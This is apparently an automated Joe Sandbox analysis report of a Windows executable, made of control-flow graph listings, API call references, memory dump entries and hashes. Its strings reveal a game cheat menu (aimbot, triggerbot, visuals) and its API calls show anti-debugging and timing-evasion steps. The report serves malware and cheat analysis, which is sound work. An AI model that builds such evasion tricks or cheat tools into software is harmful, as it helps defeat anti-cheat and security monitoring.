7ff735dd5aee-7ff735dd5af5 815->832 833 7ff735dd5a9f-7ff735dd5ac5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 816->833 834 7ff735dd5920-7ff735dd5927 816->834 821 7ff735dd5ca4-7ff735dd5cba memset 817->821 822 7ff735dd5ce7-7ff735dd5d04 SetLastError GetLastError 817->822 826 7ff735dd5cc0-7ff735dd5cc4 821->826 844 7ff735dd6096-7ff735dd60b2 CreateToolhelp32Snapshot 822->844 845 7ff735dd5d0a-7ff735dd5d21 call 7ff735dd6b70 822->845 829 7ff735dd5ec6-7ff735dd5eee VirtualFree call 7ff735dd6b40 826->829 830 7ff735dd5cca-7ff735dd5cd4 826->830 860 7ff735dd5ef4-7ff735dd5efb 829->860 861 7ff735dd606f-7ff735dd6095 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 829->861 830->826 839 7ff735dd5cd6-7ff735dd5ce1 VirtualFree 830->839 831->817 840 7ff735dd5afb-7ff735dd5b2c 832->840 841 7ff735dd5c1c-7ff735dd5c3f 832->841 833->815 842 7ff735dd5a5c-7ff735dd5a7f 834->842 843 7ff735dd592d-7ff735dd5a5a 834->843 839->822 853 7ff735dd5b30-7ff735dd5c11 840->853 841->831 843->833 843->842 848 7ff735dd615d-7ff735dd6175 GetTickCount 844->848 849 7ff735dd60b8-7ff735dd60d0 Thread32First 844->849 863 7ff735dd5e9f-7ff735dd5ec5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 845->863 864 7ff735dd5d27-7ff735dd5d2e 845->864 859 7ff735dd6180-7ff735dd6194 848->859 857 7ff735dd6154-7ff735dd6157 CloseHandle 849->857 858 7ff735dd60d6-7ff735dd60e0 GetCurrentProcessId 849->858 853->853 862 7ff735dd5c17-7ff735dd5c1a 853->862 857->848 865 7ff735dd6142-7ff735dd6152 Thread32Next 858->865 866 7ff735dd60e2-7ff735dd60f0 GetCurrentThreadId 858->866 859->859 867 7ff735dd6196-7ff735dd61a1 GetTickCount 859->867 868 7ff735dd5f01-7ff735dd5f36 860->868 869 7ff735dd602c-7ff735dd604f 860->869 861->844 862->831 862->841 863->829 871 7ff735dd5d34-7ff735dd5d69 864->871 872 7ff735dd5e5c-7ff735dd5e7f 864->872 865->857 865->858 866->865 873 7ff735dd60f2-7ff735dd6105 OpenThread 866->873 875 7ff735dd634d-7ff735dd6361 867->875 876 7ff735dd61a7-7ff735dd61be call 7ff735dd6ba0 867->876 877 7ff735dd5f40-7ff735dd6021 868->877 869->861 880 7ff735dd5d70-7ff735dd5e51 871->880 873->865 881 7ff735dd6107-7ff735dd6127 LoadLibraryA GetProcAddress 873->881 884 7ff735dd6613-7ff735dd662f GetProcessHeap HeapSetInformation 875->884 885 7ff735dd6367-7ff735dd637e call 7ff735dd6bc0 875->885 899 7ff735dd61c4-7ff735dd61cb 876->899 900 7ff735dd6326-7ff735dd634c call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 876->900 877->877 887 7ff735dd6027-7ff735dd602a 877->887 880->880 890 7ff735dd5e57-7ff735dd5e5a 880->890 891 7ff735dd6139-7ff735dd613c CloseHandle 881->891 892 7ff735dd6129-7ff735dd6137 NtSetInformationThread 881->892 888 7ff735dd6635-7ff735dd664c call 7ff735dd6bf0 884->888 889 7ff735dd67f6-7ff735dd6812 VirtualAlloc 884->889 906 7ff735dd6384-7ff735dd638b 885->906 907 7ff735dd65ef-7ff735dd6612 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 885->907 887->861 887->869 911 7ff735dd67cf-7ff735dd67f5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 888->911 912 7ff735dd6652-7ff735dd6659 888->912 897 7ff735dd69bd-7ff735dd69ee call 7ff735dea920 889->897 898 7ff735dd6818-7ff735dd682f call 7ff735dd6c30 889->898 890->863 890->872 891->865 892->891 920 7ff735dd6835-7ff735dd683c 898->920 921 7ff735dd6996-7ff735dd69bc call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 898->921 902 7ff735dd61d1-7ff735dd6206 899->902 903 7ff735dd62f9-7ff735dd62fc 899->903 900->875 910 7ff735dd6210-7ff735dd62f1 902->910 914 7ff735dd6300-7ff735dd6324 903->914 915 7ff735dd65b5-7ff735dd65bb 906->915 916 7ff735dd6391-7ff735dd65af 906->916 907->884 910->910 922 7ff735dd62f7 910->922 911->889 923 7ff735dd665f-7ff735dd6698 912->923 924 7ff735dd678c-7ff735dd6796 912->924 914->900 914->914 926 7ff735dd65c0-7ff735dd65ed 915->926 916->915 927 7ff735dd6842-7ff735dd6877 920->927 928 7ff735dd6969-7ff735dd696c 920->928 921->897 922->900 930 7ff735dd66a0-7ff735dd6781 923->930 931 7ff735dd67a0-7ff735dd67cd 924->931 926->907 926->926 933 7ff735dd6880-7ff735dd6961 927->933 936 7ff735dd6970-7ff735dd6994 928->936 930->930 935 7ff735dd6787-7ff735dd678a 930->935 931->911 931->931 933->933 937 7ff735dd6967 933->937 935->911 935->924 936->921 936->936 937->921
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD56A4
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD56AF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1843798239-2657877971
                                                                                                                                                                                                              • Opcode ID: f6dc64b6eaa81990a047da6be329a26b6ee895c9142677a65225b002ccd37885
                                                                                                                                                                                                              • Instruction ID: cd4034f29f628db56af211cf502e2e25429cf837365324ea0434361c8f2e819f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6dc64b6eaa81990a047da6be329a26b6ee895c9142677a65225b002ccd37885
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63411927C39B835AE703A735D8821A4E754EFA3B80B91D333ED5435952EF29B1865214

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 938 7ff735de8540-7ff735de8571 call 7ff735dd2230 941 7ff735de85a5-7ff735de85b9 938->941 942 7ff735de8573 938->942 943 7ff735de85c0-7ff735de85d2 call 7ff735dd2230 941->943 942->941 944 7ff735de8575-7ff735de858f 942->944 950 7ff735de8646-7ff735de865a 943->950 951 7ff735de85d4-7ff735de85de 943->951 946 7ff735de8591-7ff735de859b 944->946 947 7ff735de85a2 944->947 946->947 949 7ff735de859d-7ff735de85a0 946->949 947->941 949->941 951->950 952 7ff735de85e0-7ff735de85e9 951->952 953 7ff735de85eb-7ff735de8606 Sleep 952->953 954 7ff735de8608 952->954 953->943 955 7ff735de860a-7ff735de8616 Sleep 954->955 956 7ff735de8618-7ff735de8636 954->956 955->943 957 7ff735de863a-7ff735de8641 Sleep SleepEx 956->957 958 7ff735de8638 956->958 957->950 958->957
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1739919806-0
                                                                                                                                                                                                              • Opcode ID: ab111ca79f4a78db496b9a69bf0d871289a32234e7ec8453937e56b0bf773d7e
                                                                                                                                                                                                              • Instruction ID: 78ccd98d9c137b093a9f008f25cf922734c8e04c14e56bb9c4431691a23c8cfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab111ca79f4a78db496b9a69bf0d871289a32234e7ec8453937e56b0bf773d7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74212721B3A64B52FE1CAB05A4D1279D251AF88FC0FC44138EE5E0B7C6DD2CF4426790

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2168557111-0
                                                                                                                                                                                                              • Opcode ID: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
                                                                                                                                                                                                              • Instruction ID: d7328291a582ed5115af83ecfc521a646e8d54c8c6deffae6deea10b932761cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85E03932A08B8292E700AB50F84445AF7A4FB98BC4F804435EB8C47B28CF7CC1A5CB40

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Random_device@std@@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1041445435-0
                                                                                                                                                                                                              • Opcode ID: 1277d883f72dae62fb0219c161c67b0fae52470f6efe841d722db1aaa51dd26c
                                                                                                                                                                                                              • Instruction ID: 51bbafe3eb1613e5ef4c2f96554b240981d97fef8461fc73a62e2b3d5a9a5945
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1277d883f72dae62fb0219c161c67b0fae52470f6efe841d722db1aaa51dd26c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D511AE3273864396FF68AB64F4A637AE295FBC5700F801135E54E82BD5DE3CD2005710

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 977 7ff735da1000-7ff735da1016 GetSystemMetrics
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-0
                                                                                                                                                                                                              • Opcode ID: abf6917f7ad20cba7f178f7487317c45415fce318fb883ae6b8b72ed5257d05d
                                                                                                                                                                                                              • Instruction ID: 0076b55365c1426b7288a77b39c21b64555148531a7e2f090dee85dc26acb758
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abf6917f7ad20cba7f178f7487317c45415fce318fb883ae6b8b72ed5257d05d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B01274E5A2C3D7EB1C3B326C9203962A0AB0CF10FD0043AC50A49320CD3D91DA5F20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00007FF735DDB423
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB31F3
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3190: memmove.VCRUNTIME140 ref: 00007FF735DB3213
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3233
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDA4E0: CreateThread.KERNEL32 ref: 00007FF735DDA5CA
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDA4E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDA605
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDCF90
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDD21D
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: memset.VCRUNTIME140 ref: 00007FF735DD39B0
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A00
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A12
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A24
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A36
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A48
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A5A
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A6C
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A7E
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A90
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AA2
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3AB4
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AC6
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AD8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AEA
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AFC
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B0E
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B20
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B32
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B44
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B56
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B68
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B7A
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B8C
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3B9E
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDD2BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memmove$AsyncCreateStateThreadexitfreemallocmemset
                                                                                                                                                                                                              • String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
                                                                                                                                                                                                              • API String ID: 352513250-2218353132
                                                                                                                                                                                                              • Opcode ID: e41536d4fd240ff1ba4a7aa7d897d4f427ab51982afeffa53f5ce13242ca367e
                                                                                                                                                                                                              • Instruction ID: bde14d377bb8206e5b2e13dbfb3bfe94d393e7d3c4432a08c22595af74266c7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e41536d4fd240ff1ba4a7aa7d897d4f427ab51982afeffa53f5ce13242ca367e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9023E232919AC7A6E700EB25D9802F9B760FB99F44F858332DA4D1B261DF7DE184DB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140 ref: 00007FF735DD7723
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E04
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E45
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E86
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8EC5
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F04
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F43
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F82
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8FC1
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9000
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD903F
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD907E
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD90C3
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9108
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD914D
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9192
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD91D7
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD921C
